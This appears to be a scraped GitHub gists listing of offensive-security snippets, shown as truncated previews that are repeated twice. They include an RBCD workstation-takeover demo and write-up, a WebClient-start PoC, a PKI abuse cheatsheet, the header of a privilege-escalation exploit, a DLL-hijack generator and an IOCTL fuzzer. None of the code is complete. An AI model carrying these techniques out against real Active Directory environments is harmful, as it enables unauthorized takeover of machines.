klezVirus

## rbcd_demo.ps1
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1

# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami

# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"

## Workstation-Takeover.md

      
              1 file
            
          
              0 forks
            
          
              1 comment
            
          
              0 stars
            
          
                klezVirus
                / Workstation-Takeover.md
            
            
              Created
              September 24, 2021 13:16
                — forked from gladiatx0r/Workstation-Takeover.md
            
              
                From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
              
          
    Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
Relaying that machine authentication to LDAPS for configuring RBCD
RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

  
## EtwStartWebClient.cs
using System.Runtime.InteropServices;
using System;

/*
 * Simple C# PoC to enable WebClient Service Programmatically
 * Based on the C++ version from @tirannido (James Forshaw)
 * Twitter: https://twitter.com/tiraniddo
 * URL: https://www.tiraniddo.dev/2015/03/starting-webclient-service.html
 *
 * Compile with:

## PKI_Abuse_cheatsheet.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                klezVirus
                / PKI_Abuse_cheatsheet.md
            
            
              Created
              September 19, 2021 16:36
                — forked from Flangvik/PKI_Abuse_cheatsheet.md
            
              
                PKI Abuse CheatSheet
              
          
    PKI Abuse

Some golden links when you are having issues:
https://social.technet.microsoft.com/Forums/windows/en-US/96016a13-9062-4842-b534-203d2f400cae/ca-certificate-request-error-quotdenied-by-policy-module-0x80094800quot-windows-server-2008?forum=winserversecurity
Enumerating ADCS On Linux

Download and install Certi


## CVE-2018-5701.py
# Exploit title:      iolo System Mechanic Pro v. <= 15.5.0.61 - Arbitrary Write Local Privilege Escalation (LPE)
# Exploit Authors:    d3adc0de
# CVE:                CVE-2018-5701
# Date:               01/06/2021
# Vendor Homepage:    https://www.iolo.com/
# Download:           https://www.iolo.com/products/system-mechanic-ultimate-defense/
# https://mega.nz/file/xJgz0QYA#zy0ynELGQG8L_VAFKQeTOK3b6hp4dka7QWKWal9Lo6E
# Version:            v.15.5.0.61
# Tested on:          Windows 10 Pro x64 v.1903 Build 18362.30
# Category:           local exploit

## crude_ioctl_fuzzer.py
import random
import sys
import struct
import io
from ctypes import windll, POINTER, byref
from ctypes.wintypes import LPVOID, DWORD, LPCSTR, LPSTR, BOOL, HANDLE
from enum import Enum

'''
#define IOCTL_HEVD_TYPE_CONFUSION       0x222023

## CLI-AMD.js
define(["require", "exports"], function (require, exports) {
    /**
     * Helper to use the Command Line Interface (CLI) easily with both Windows and Unix environments.
     * Requires underscore or lodash as global through "_".
     */
    var Cli = (function () {
        function Cli() {
        }
        /**
         * Execute a CLI command.

## evilldll-gen.sh
#!/bin/sh

usage(){
        echo "# #################                Simple CPP to DLL Utility               ################# #"
        echo "# This tool has been maded to easily generate and compile a DLL to be used for DLL hijacking.#"
        echo "#                                                                                            #"
        echo "# ========================================================================================== #"
        echo "#                                                                                            #"
        echo "# Usage:                                                                                     #"
        echo "#   ./dll-gcc [Options] <input-file>                                                         #"

## cve-2017-11356.py
import requests
import sys
import argparse
import traceback
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By

## csvi-check.py
import csv
import sys
import os
import argparse

def check(args):
    csv_injection = ["=", "@", "+", "-"]
    end = "\n  [-] Finished!"
    novuln = " No Vulnerability found."
	# import the necessary toolsets
	Import-Module .\powermad.ps1
	Import-Module .\powerview.ps1

	# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
	whoami

	# the target computer object we're taking over
	$TargetComputer = "primary.testlab.local"
	using System.Runtime.InteropServices;
	using System;

	/*
	* Simple C# PoC to enable WebClient Service Programmatically
	* Based on the C++ version from @tirannido (James Forshaw)
	* Twitter: https://twitter.com/tiraniddo
	* URL: https://www.tiraniddo.dev/2015/03/starting-webclient-service.html
	*
	* Compile with:
	# Exploit title: iolo System Mechanic Pro v. <= 15.5.0.61 - Arbitrary Write Local Privilege Escalation (LPE)
	# Exploit Authors: d3adc0de
	# CVE: CVE-2018-5701
	# Date: 01/06/2021
	# Vendor Homepage: https://www.iolo.com/
	# Download: https://www.iolo.com/products/system-mechanic-ultimate-defense/
	# https://mega.nz/file/xJgz0QYA#zy0ynELGQG8L_VAFKQeTOK3b6hp4dka7QWKWal9Lo6E
	# Version: v.15.5.0.61
	# Tested on: Windows 10 Pro x64 v.1903 Build 18362.30
	# Category: local exploit
	import random
	import sys
	import struct
	import io
	from ctypes import windll, POINTER, byref
	from ctypes.wintypes import LPVOID, DWORD, LPCSTR, LPSTR, BOOL, HANDLE
	from enum import Enum

	'''
	#define IOCTL_HEVD_TYPE_CONFUSION 0x222023
	define(["require", "exports"], function (require, exports) {
	/**
	* Helper to use the Command Line Interface (CLI) easily with both Windows and Unix environments.
	* Requires underscore or lodash as global through "_".
	*/
	var Cli = (function () {
	function Cli() {
	}
	/**
	* Execute a CLI command.
	#!/bin/sh

	usage(){
	echo "# ################# Simple CPP to DLL Utility ################# #"
	echo "# This tool has been maded to easily generate and compile a DLL to be used for DLL hijacking.#"
	echo "# #"
	echo "# ========================================================================================== #"
	echo "# #"
	echo "# Usage: #"
	echo "# ./dll-gcc [Options] <input-file> #"
	import requests
	import sys
	import argparse
	import traceback
	import pytest
	import time
	import json
	from selenium import webdriver
	from selenium.webdriver.chrome.options import Options
	from selenium.webdriver.common.by import By
	import csv
	import sys
	import os
	import argparse

	def check(args):
	csv_injection = ["=", "@", "+", "-"]
	end = "\n [-] Finished!"
	novuln = " No Vulnerability found."